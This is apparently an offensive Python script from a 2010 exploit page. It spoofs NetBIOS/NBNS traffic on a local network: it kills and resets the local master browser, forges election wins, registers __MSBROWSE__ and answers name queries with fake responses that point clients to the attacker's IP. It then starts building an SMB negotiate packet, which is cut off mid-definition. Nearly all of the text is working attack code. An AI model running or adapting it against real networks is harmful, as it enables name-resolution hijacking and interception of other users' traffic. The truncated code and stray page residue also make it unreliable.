# More Info: http://g-laurent.blogspot.com/2010/04/turning-smb-client-bug-to-server-side.html |
import sys,SocketServer,socket,threading,time,random |
from random import * |
from time import sleep |
from socket import * |
|
if len (sys.argv)< = 2 : |
sys.exit( 'Usage: pwn.py Your_ip Broadcast_ip\n\r Example: pwn.py 10.0.0.1 10.0.0.255' ) |
|
ip = str (sys.argv[ 1 ]) |
nbns = str (sys.argv[ 2 ]), 137 |
browser = str (sys.argv[ 2 ]), 138 |
|
|
elec = "\x42\x4f\x00" |
domainmasterbro = "\x42\x4c\x00" |
|
##BROWSER election request |
browserelect = [ chr ( int (a, 16 )) for a in """ |
11 02 bd 82 c0 a8 00 96 00 8a 00 ae 00 00 20 46 |
47 45 4e 45 43 45 50 46 49 43 41 43 41 43 41 43 |
41 43 41 43 41 43 41 43 41 43 41 43 41 41 41 00 |
20 46 48 45 50 46 43 45 4c 45 48 46 43 45 50 46 |
46 46 41 43 41 43 41 43 41 43 41 43 41 43 41 42 |
4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00 |
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
00 00 11 00 00 14 00 00 00 00 00 00 00 00 00 e8 |
03 00 00 00 00 00 00 00 00 14 00 56 00 03 00 01 |
00 01 00 02 00 25 00 5c 4d 41 49 4c 53 4c 4f 54 |
5c 42 52 4f 57 53 45 00 08 09 a8 0f 01 20 1b e9 |
a5 00 00 00 00 00 56 4d 42 4f 58 00""" .split()] |
|
##Local Master Announcement |
browsermaster = [ chr ( int (a, 16 )) for a in """ |
11 02 bd 2c c0 a8 00 96 00 8a 00 bb 00 00 20 45 |
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43 |
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00 |
20 46 48 45 50 46 43 45 4c 45 48 46 43 45 50 46 |
46 46 41 43 41 43 41 43 41 43 41 43 41 43 41 42 |
4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00 |
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
00 00 11 00 00 21 00 00 00 00 00 00 00 00 00 e8 |
03 00 00 00 00 00 00 00 00 21 00 56 00 03 00 01 |
00 00 00 02 00 32 00 5c 4d 41 49 4c 53 4c 4f 54 |
5c 42 52 4f 57 53 45 00 0f 00 80 fc 0a 00 4d 41 |
53 54 45 52 00 00 00 00 00 00 00 00 00 00 00 06 |
2b 10 84 00 00 0f 01 55 aa 00""" .split()] |
|
resetcache = [ chr ( int (a, 16 )) for a in """ |
11 0a 6b a8 c0 a8 0a 66 00 8a 00 c5 00 00 20 45 |
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43 |
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00 |
20 41 42 41 43 46 50 46 50 45 4e 46 44 45 43 46 |
43 45 50 46 48 46 44 45 46 46 50 46 50 41 43 41 |
42 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00 |
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
00 00 11 00 00 2b 00 00 00 00 00 00 00 00 00 00 |
00 00 00 00 00 00 00 00 00 2b 00 56 00 03 00 01 |
00 01 00 02 00 3c 00 5c 4d 41 49 4c 53 4c 4f 54 |
5c 42 52 4f 57 53 45 00 0e 02""" .split()] |
|
resetlbm = [ chr ( int (a, 16 )) for a in """ |
11 0a 6b a8 c0 a8 0a 66 00 8a 00 c5 00 00 20 45 |
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43 |
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00 |
20 41 42 41 43 46 50 46 50 45 4e 46 44 45 43 46 |
43 45 50 46 48 46 44 45 46 46 50 46 50 41 43 41 |
42 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00 |
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
00 00 11 00 00 2b 00 00 00 00 00 00 00 00 00 00 |
00 00 00 00 00 00 00 00 00 2b 00 56 00 03 00 01 |
00 01 00 02 00 3c 00 5c 4d 41 49 4c 53 4c 4f 54 |
5c 42 52 4f 57 53 45 00 0e 01""" .split()] |
|
##Browser Master annoncement |
masterannon = [ chr ( int (a, 16 )) for a in """ |
11 02 bd 2c c0 a8 00 96 00 8a 00 bb 00 00 20 45 |
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43 |
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00 |
20 46 48 45 50 46 43 45 4c 45 48 46 43 45 50 46 |
46 46 41 43 41 43 41 43 41 43 41 43 41 43 41 42 |
4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00 |
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
00 00 11 00 00 21 00 00 00 00 00 00 00 00 00 e8 |
03 00 00 00 00 00 00 00 00 21 00 56 00 03 00 01 |
00 00 00 02 00 32 00 5c 4d 41 49 4c 53 4c 4f 54 |
5c 42 52 4f 57 53 45 00 0d 4d 41 53 54 45 52 00""" .split()] |
|
regmsbrowse = [ chr ( int (a, 16 )) for a in """ |
be 6e 29 10 00 01 00 00 00 00 00 01 20 41 42 41 |
43 46 50 46 50 45 4e 46 44 45 43 46 43 45 50 46 |
48 46 44 45 46 46 50 46 50 41 43 41 42 00 00 20 |
00 01 c0 0c 00 20 00 01 00 04 93 e0 00 06 80 00 |
c0 a8 00 96""" .split()] |
|
##NBNS Spoofing |
spoof = [ chr ( int (a, 16 )) for a in """ |
08 f3 85 80 00 00 00 01 00 00 00 00 20 46 48 45 |
50 46 43 45 4c 45 48 46 43 45 50 46 46 46 41 43 |
41 43 41 43 41 43 41 43 41 43 41 42 4e 00 00 20 |
00 01 00 04 93 e0 00 06 00 00""" .split()] |
|
def nametid(data,packet,service): |
pack = packet[:] |
pack[ 2 : 4 ] = data[ 2 : 4 ] ##Transaction ID |
pack[ 4 : 8 ] = inet_aton( str (sys.argv[ 1 ])) ##OurIP Addres |
pack[ 48 : 82 ] = data[ 48 : 79 ] + service ##Service/domain name |
return pack |
|
def nametidrand(data,packet,service): |
pack = packet[:] |
pack[ 2 : 4 ] = "\x80" + str ( chr (choice( range ( 256 )))) ##Transaction ID |
pack[ 4 : 8 ] = inet_aton( str (sys.argv[ 1 ])) ##OurIP Addres |
pack[ 48 : 82 ] = data[ 48 : 79 ] + service ##Service/domain name |
return pack |
|
def addipbrow(packet): |
pack = packet[:] |
pack[ 4 : 8 ] = inet_aton( str (sys.argv[ 1 ])) |
return pack |
|
def addipnb(packet): |
pack = packet[:] |
pack[ len (packet) - 4 :] = inet_aton( str (sys.argv[ 1 ])) |
return pack |
|
def sockbroad(packet,host): |
s = socket(AF_INET,SOCK_DGRAM) |
s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1 ) |
s.sendto(packet,host) |
|
class BROWSER(SocketServer.BaseRequestHandler): |
|
def server_bind( self ): |
self .socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1 ) |
self .socket.bind( self .server_address) |
|
def handle( self ): |
ip = inet_aton( str (sys.argv[ 1 ])) |
request, socket = self .request |
data = request |
print "From:" , self .client_address |
if data[ 168 ] = = "\x01" or data[ 168 ] = = "\x0f" or data[ 168 ] = = "\x08" and self .client_address[ 0 ] ! = sys.argv[ 1 ]: |
|
sockbroad(''.join(addipbrow(resetcache)),browser) |
print "[+]LMB cache Successfully Reseted" |
|
sockbroad(''.join(addipbrow(resetlbm)),browser) |
print "[+]LMB Successfully killed" |
|
for x in range ( 4 ): |
sockbroad(''.join(nametid(data,browserelect, elec)),browser) |
sleep( 0.8 ) |
print "[+] Election Won !\n" |
|
for x in range ( 4 ): |
sleep( 0.5 ) |
sockbroad(''.join(addipnb(regmsbrowse)),nbns) |
print "[+]Now Register __MSBROWSE__ :] " |
|
sockbroad(''.join(nametidrand(data,browsermaster, elec)),browser) |
sleep( 1 ) |
sockbroad(''.join(nametidrand(data,masterannon, domainmasterbro)),browser) |
print "[+] Now LBM ! \n" |
|
#NBNS SPOOF; |
|
def namenbnstid(data,packet): |
pack = packet[:] |
pack[ 0 : 2 ] = data[ 0 : 2 ] ##Transaction ID |
pack[ 12 : 48 ] = data[ 12 : 48 ] ##Netbios name |
return pack |
|
class NBNS(SocketServer.BaseRequestHandler): |
|
def server_bind( self ): |
self .socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1 ) |
self .socket.bind( self .server_address) |
|
def handle( self ): |
request, socket = self .request |
data = request |
print "From:" , self .client_address |
#Hijack |
if data[ 2 : 4 ] = = "\x01\x10" : |
buffer0 = ''.join(namenbnstid(data,spoof)) + inet_aton( str (sys.argv[ 1 ])) |
socket.sendto(buffer0, self .client_address) |
print "Fake NBNS Response sended\n" |
|
packetnego = ( |
##SMB Header |
"\x00\x00\x00\x7f" #Netbios length |
"\xff\x53\x4d\x42" #Server type |
"\x72" #Operation/Command |
0 条评论。